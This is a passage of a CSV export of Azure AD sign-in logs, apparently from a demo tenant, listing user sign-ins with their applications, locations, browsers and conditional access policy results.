{'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 11:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",8900d912-3d17-47c8-917b-3b4375ab1100,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,8900d912-3d17-47c8-917b-3b4375ab1100,SigninLogs,Sucess,50.6406517,5.572050095
+55,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:19.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1e1968e5-b2b5-4bde-9c05-d76a5d370029,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 20:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",0db84f87-d59a-4024-94d6-18fb2dbb2200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,0db84f87-d59a-4024-94d6-18fb2dbb2200,SigninLogs,Sucess,33.45851135,-82.21336365
+56,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:16.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,834d843c-1eae-4cab-9699-ac676b09984e,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",93d60bd4-ad49-40a5-9c6c-157d6e061b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,93d60bd4-ad49-40a5-9c6c-157d6e061b00,SigninLogs,Sucess,50.6406517,5.572050095
+57,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:17.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",success,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",17ea6265-ad23-4765-8c42-0b9f66591a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,17ea6265-ad23-4765-8c42-0b9f66591a00,SigninLogs,Sucess,50.6406517,5.572050095
+58,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:03.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d85e088e-d42f-4079-8e77-4cabb6859f07,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",b3c0863d-787e-45d0-a1b5-da5491591200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b3c0863d-787e-45d0-a1b5-da5491591200,SigninLogs,Sucess,38.73078156,-78.17196655
+59,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:55.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",7cccc312-d1e5-411d-a6d5-f8504f2a1f00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7cccc312-d1e5-411d-a6d5-f8504f2a1f00,SigninLogs,Sucess,51.4458313,-0.969720006
+60,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:04.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d420991d-bdfd-4e10-b037-1dd045d955cd,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",71d7ba06-8885-45d4-a319-08fc0f231200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,71d7ba06-8885-45d4-a319-08fc0f231200,SigninLogs,Sucess,33.7984581,-84.38828278
+61,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:33.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,22bb94fa-643e-4b79-bdd8-64415ac1a8f1,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f22e123a-cab3-4cb1-81e0-9a3bbcb01400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,f22e123a-cab3-4cb1-81e0-9a3bbcb01400,SigninLogs,Sucess,33.7984581,-84.38828278
